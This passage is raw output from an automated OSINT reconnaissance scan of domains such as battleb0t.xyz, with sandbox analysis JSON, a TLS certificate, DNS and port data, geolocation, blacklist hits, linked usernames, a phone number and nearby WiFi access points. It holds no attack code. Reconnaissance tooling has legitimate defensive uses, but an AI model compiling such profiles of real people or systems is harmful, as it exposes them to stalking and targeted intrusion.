u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "xterm.min_1_.js" has type "data"- [targetUID: N/A]\n "crypto-js_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003628]\n "esp-logo_1_.png" has type "PNG image data 200 x 200 8-bit/color RGB non-interlaced"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003628]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF89E15DF29DBA29AC.TMP" has type "data"- Location: [%TEMP%\\~DF89E15DF29DBA29AC.TMP]- [targetUID: 00000000-00003628]\n "~DF11E296B765867100.TMP" has type "data"- Location: [%TEMP%\\~DF11E296B765867100.TMP]- [targetUID: 00000000-00003628]\n "~DFDF1C77609DE36ABC.TMP" has type "data"- Location: [%TEMP%\\~DFDF1C77609DE36ABC.TMP]- [targetUID: 00000000-00003628]\n "~DFE2D69294CDF7FEC7.TMP" has type "data"- Location: [%TEMP%\\~DFE2D69294CDF7FEC7.TMP]- [targetUID: 00000000-00003628]\n "favicon_1_.ico" has type "MS Windows icon resource - 3 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "index_1_.js" has type "Java source ASCII text"- [targetUID: N/A]\n "_4D0457A1-EE71-11ED-B780-080027413500_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._4D04579F-EE71-11ED-B780-080027413500_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_54818866-EE71-11ED-B780-080027413500_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "urlref_httpsespressif.github.ioesptool-js" has type "HTML document ASCII text"- [targetUID: N/A]\n "xterm_1_.css" has type "ASCII text"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "PZPOVD2E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\PZPOVD2E.txt]- [targetUID: 00000000-00003628]\n "LC3EP32V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LC3EP32V.txt]- [targetUID: 00000000-00003628]\n "OOO5AMX1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OOO5AMX1.txt]- [targetUID: 00000000-00003628]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "css_1_.css" has type "ASCII text"- [targetUID: N/A]\n "KXCE27YI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KXCE27YI.txt]- [targetUID: 00000000-00003628]\n "ZDDLZ4C8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZDDLZ4C8.txt]- [targetUID: 00000000-00003628]\n "2YDQ0988.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2YDQ0988.txt]- [targetUID: 00000000-00003628]\n "Z9ELHG1D.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Z9ELHG1D.txt]- [targetUID: 00000000-00003628]\n "esptool-js_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "favicon_2_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://espressif.github.io/esptool-js/"\n Pattern match: "https://espressif.github.io"\n Pattern match: "https://espressif.github.io/esptool-js"\n Pattern match: "8cu.mP/n9kjk@$x8qf.3|`,gC/?\'.75ee&-S9ZQPB=z8`VLf&*c,VVkyg=/4Q?Ecr`u:ml35&sDTF!F@nm.A"\n Pattern match: "https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"\n Pattern match: "https://github.com/chjj/term.js"\n Pattern match: "SUIDmicrosoft.com/9216302719590431032051132555703631031934MUID1D8C8FE0DEC66C4D23ED9CECDF8A6DCCmicrosoft.com/1025315968512031110405132555703631031934_EDGE_Vmicrosoft.com/9216315968512031110405132571328631031934SRCHDAF=NOFORMmicrosoft.com/1024332378944031085"\n Pattern match: "SUIDmicrosoft.com/9216302719590431032051132555703631031934MUID1D8C8FE0DEC66C4D23ED9CECDF8A6DCCmicrosoft.com/1025315968512031110405132555703631031934SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482"\n Pattern match: "SUIDmicrosoft.com/9216302719590431032051132555703631031934SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743SRCHUSRDOB=20220131mi"\n Pattern match: "https://fonts.gstatic.com/s/orbitron/v29/yMJMMIlzdpvBhQQL_SC3X9yhF25-T1nyGy6BoWg1.woff"\n Pattern match: "9216315968512031110405132915078631031934MUID2F6B3FECBAF36563318B2CE0BB7764BEmsn.com/1025315968512031110405132915078631031934"\n Pattern match: "MUIDB1D8C8FE0DEC66C4D2 | 185.199.111.153 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | United States | clientify.net |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Vero (Category: art)
https://vero.co/login | login |
| 2023-05-12 02:56:52 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:28:ae:be:17:84:18:1b:e1:bf:c2:45:52:c1:
a5:6a:08:4a:bc:c1:e3:a4:de:5e:d0:05:9f:d6:99:
22:94:16:f7:d2:69:68:71:09:4a:62:e7:41:0d:0a:
be:3e:3b:51:6d:0b:4a:0f:76:3a:b0:8e:cb:56:a6:
21:8f:de:9f:c1:45:ea:d1:38:90:03:24:5c:77:6f:
cd:06:86:05:00:ae:fc:49:fe:8f:e8:85:de:e7:e4:
d0:99:c5:ad:e4:c5:9c:9a:95:9e:97:20:79:ed:7e:
c1:65:47:a7:ce:2c:b4:2b:9e:4c:1f:8e:21:8f:4e:
cf:f7:3e:4f:ff:b2:88:aa:90:dd:b7:be:8a:db:d2:
17:66:cc:6f:09:3d:67:e8:3c:91:39:a6:90:69:62:
e9:f2:9c:b4:d3:ba:96:0b:b2:0e:b2:74:eb:8a:64:
f6:d7:18:6c:22:f7:1e:bc:17:2f:20:0c:dc:30:1b:
5e:7d:a8:0b:34:ce:8a:75:55:4f:72:8b:d6:d7:dc:
63:55:19:dd:2a:a0:25:0a:50:bd:17:df:74:d9:8e:
df:7b:ba:19:b8:f5:47:fd:97:bf:18:2b:99:ec:f3:
58:72:eb:64:34:43:28:b7:d3:7f:de:05:80:58:fb:
f6:05:86:02:1c:8d:eb:d5:23:a1:08:9a:01:84:aa:
05:5a:57:5b:4f:80:96:8a:65:18:8f:fb:bb:dd:91:
f1:8e:b1:05:2f:76:93:8f:28:86:73:78:5c:d4:fe:
b8:81:83:79:71:79:e9:31:46:fb:22:a9:30:c3:0b:
03:79:d0:e6:24:cf:e4:e0:cb:3e:91:71:20:ec:40:
44:0f:22:88:b4:5a:5f:cd:f2:41:b7:a9:21:3e:74:
54:3b:a0:07:32:4e:5c:e7:71:a3:33:95:bd:ee:27:
4a:b2:53:d1:06:de:2c:39:7b:83:7f:1c:cf:0a:28:
32:ef:07:d4:d3:ef:a5:9d:8a:8a:36:97:d5:6f:97:
57:8e:aa:22:4e:6c:70:6c:aa:43:59:1c:d0:88:a6:
26:22:1b:20:62:45:6e:6e:62:40:f6:bf:20:b1:b8:
43:17:25:80:1d:c9:c1:63:ed:d3:a8:bc:4b:68:5d:
f2:19:96:37:4a:82:70:a9:86:22:f6:56:84:02:f9:
b4:a7:6c:3d:03:4c:59:fe:71:81:0a:71:7e:9e:7c:
1a:5d:b6:ce:77:db:f9:80:a5:2d:65:a3:96:1f:c9:
ca:a0:c7:b0:9d:21:28:db:1c:6a:4c:c7:37:20:39:
9f:b7:63:e2:80:c5:2d:53:fd:3e:c8:1a:cf:e7:76:
9f:bc:92:4a:58:81:84:d1:30:a4:4e:12:c7:e5:10:
eb:dc:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
29:76:7a:56:81:b0:95:01:3f:0a:9d:7d:c4:e5:17:5f:14:64:
31:1f:ff:e8:89:b7:73:d0:e5:48:95:94:90:79:71:5f:5e:bd:
11:57:2e:35:46:0a:d0:46:0d:68:f1:c5:7a:ea:d2:5c:76:4c:
32:7a:df:e5:15:1f:4c:85:80:9e:03:4d:56:80:ad:4b:2c:6b:
b1:00:96:20:ff:02:5c:fe:b3:6b:a4:df:10:d7:1a:34:e6:05:
8a:93:ce:43:93:43:f0:21:83:34:dd:3b:5d:cd:02:a2:f7:69:
01:e6:a2:9d:c4:0a:00:06:c9:25:8d:66:34:7e:e7:56:fc:96:
0c:11:f2:15:8e:1b:ee:a8:bc:70:25:91:eb:fa:be:46:78:f9:
43:e5:48:f9:88:3a:38:53:b4:c2:e1:83:7c:30:6a:d7:b6:1a:
08:51:7a:03:5c:ed:3d:25:45:1e:03:b4:ab:40:92:83:1a:fd:
41:7d:5f:d2:40:54:63:0d:0f:36:db:fd:2f:13:eb:5b:2e:6b:
08:c3:7d:13:ce:a1:6a:1d:ba:e8:54:c7:19:87:ff:c8:d8:2e:
77:d7:9f:17:34:29:b1:63:1a:a3:70:9f:2d:0d:32:ff:45:66:
9c:81:e8:0c:a2:cc:74:6a:75:0f:61:f4:74:74:89:88:86:e3:
ba:d0:68:2d
|
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | wattpad (Category: social)
https://www.wattpad.com/user/ayshoo | ayshoo |
| 2023-05-12 03:11:17 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Amsterdam', u'security': {u'is_vpn': False}, u'city_geoname_id': 2759794, u'region_geoname_id': 2749879, u'country': u'Netherlands', u'region': u'North Holland', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'CloudFlare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/NL_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/NL_flag.png', u'unicode': u'U+1F1F3 U+1F1F1', u'emoji': u'\U0001f1f3\U0001f1f1'}, u'postal_code': u'1012', u'longitude': 4.8975, u'country_code': u'NL', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Amsterdam', u'current_time': u'05:11:16'}, u'latitude': 52.3759, u'country_geoname_id': 2750405, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'188.114.96.1', u'continent': u'Europe', u'region_iso_code': u'NH'} | 188.114.96.1 |
| 2023-05-12 03:11:26 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14806242599 |
| 2023-05-12 02:45:34 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | battleb0t.xyz. 300 IN TXT "v=spf1 include:_spf.mx.cloudflare.net ~all" | battleb0t.xyz |
| 2023-05-12 02:54:13 | HTTP Status Code | No | Web Spider | 0 | 1 | 1 | 0 | None | 403 | ayhu.xyz |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.39): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:41 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06QWFV48ACFBYY7E5EAJW1H"], "Server": ["Netlify"]} | 104.196.30.220 |
| 2023-05-12 03:33:44 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | !22222222222222222222222222222222222222222222222222
sH GN
t5ad
C'Y2z
OB:`S
pF>oj
OQTeuy
YYK`s
gnqV
N9FX6
EQY66
1pO'94
pj'R7pz`
0Kdes
xnj $
Zx<g?
X2r:z
T/z`A
G'?QN
$RpG9
Vdrnr1
mP0>Lc
1RNG\T
Uwp9'
YYWvz
Ru?wnz
a$$cp
m?/_J
kFpFv
2OAMYI
``VZH
.NGAM
yG`<c
lr@?L
h`NFx
@JgR
I?w<f
E BY8
<7LqQH
jLbFC0
.jG30
<.Y@O
sY_kV$
`-vSX
OOjLp
1D!@
ww P'
vOpjN
0?.qOY
1UONy
8nGqXW0
cQ2-c
5RG8 H
Gb:UW
HIRA
?q'fq
7aG'x
R`k xPW
HC$vf
P2W$g
FNGP3
:TerT
:sP1U
qhoSo
'wwEU
o_ZiP
nbO\qS
.Ojvv
EUbNTrI
5mPdRF
Df9`q
JVfrI
r0r3SF
j0AbHa
oBwg>
COv!FO9
XM.Iz
I@V98
1QH@bG'8
.A`A<
i2wpIa
5 b V
.0G5NR1
H`ePs
!?36H
j9c!A
t4.Vel
U\D!I
H09'q
Nj\JL
fE''p
Ilg4
<dRIa"
pFH'q'
i9'9?
uO_Z\
XiH`G
$pqJwd
n5px$
6GzyU | https://pics.battleb0t.xyz/images/random_2.jpeg |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.94): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:40 | Physical Coordinates | No | AbstractAPI | 94 | 0 | 2 | 0 | None | 34.0544, -118.244 | 185.199.111.153 |
| 2023-05-12 02:44:04 | Raw Data from RIRs | No | Tool - WAFW00F | 0 | 0 | 1 | 0 | None | [{"url": "https://battleb0t.xyz", "firewall": "Fastly", "detected": true, "manufacturer": "Fastly CDN"}, {"url": "https://battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | battleb0t.xyz |
| 2023-05-12 02:44:40 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 4 | 0 | None | googleusercontent.com | 220.30.196.104.bc.googleusercontent.com |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.234): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.126): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | ow.ly (Category: social)
http://ow.ly/user/Altpapier | Altpapier |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 2 | 0 | 3 | 0 | None | https://github.com/Altpapier/SkyHelperAPI/issues | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 03:24:21 | HTTP Headers | No | Web Spider | 10 | 0 | 2 | 0 | None | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} | https://ayhu.xyz/lol.html |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE NAMESPACE LITERAL+ AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
| 87.248.157.102 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | UECTouch (Net ID: 00:18:0A:7A:D6:B0) | 32.8608, -79.9746 |
| 2023-05-12 02:54:17 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 4 | 0 | None | 2606:4700:3037::/48 | 2606:4700:3037::6815:470e |
| 2023-05-12 03:03:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0036labs.github.io |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AG-EA (Net ID: 00:13:33:91:70:BC) | 40.2024, 29.0398 |
| 2023-05-12 03:09:55 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.105 |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.122): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 0778A5 (Net ID: 00:00:C0:07:78:A5) | 37.780462,-122.390564 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:FA:75:55) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:45:31 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.110.153]
| 185.199.110.153 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2087 | 172.67.168.252 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pgi50 (Net ID: 00:01:21:10:7A:10) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XPONENT (Net ID: 00:02:6F:C6:43:88) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01101101.github.io]
https://www.openphish.com/feed.txt | 01101101.github.io |
| 2023-05-12 02:50:15 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 18, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://base32check.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3280:120:WilError_01"\n "Local\\SM0:2564:304:WilStaging_02"\n "Local\\SM0:2564:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:3280:304:WilStaging_02"\n "Local\\SM0:3280:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3280:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5760:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "widevinecdm.dll" as clean (type is "PE32+ executable (DLL) (console) x86-64 for MS Windows")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00003280]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003280]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003280]\n "702d1a59af9078e8_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\702d1a59af9078e8_0]- [targetUID: 00000000-00003280]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003280]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\3280_676834451\\shopping_iframe_driver.js]- [targetUID: 00000000-00003280]\n "1327ba10-b1f0-4f07-a4d5-ec916f8b3b9a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1327ba10-b1f0-4f07-a4d5-ec916f8b3b9a.tmp]- [targetUID: 00000000-00003280]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.fingerprint]- [targetUID: 00000000-00003280]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005824]\n "Part-ZH" has type "data"- Location: [%TEMP%\\3280_1262552392\\Part-ZH]- [targetUID: 00000000-00003280]\n "0af395f2-e575-4794-b38d-549209b43991.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\0af395f2-e575-4794-b38d-549209b43991.tmp]- [targetUID: 00000000-00003280]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003280]\n "8141af25-c36c-4d1c-b901-863b7ca6d582.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8141af25-c36c-4d1c-b901-863b7ca6d582.tmp]- [targetUID: 00000000-00003280]\n "87110fb3-e1ef-4309-8cc5-8ec59a11e326.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\87110fb3-e1ef-4309-8cc5-8ec59a11e326.tmp]- [targetUID: 00000000-00003280]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00003280]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00003280]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.12.1\\crl-set]- [targetUID: 00000000-00003280]\n "Session_13320197892362944" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13320197892362944]- [targetUID: 00000000-00003280]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\3280_1262552392\\adblock_snippet.js]- [targetUID: 00000000-00003280]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://base32check.org/"\n Pattern match: "https://base32check.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\3280_676834451\\shopping_iframe_driver.js]- [targetUID: 00000000-00003280]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\3280_1262552392\\adblock_snippet.js]- [targetUID: 00000000-00003280]\n Dropped file: "product_page.js" - Location: [%TEMP%\\3280_676834451\\product_page.js]- 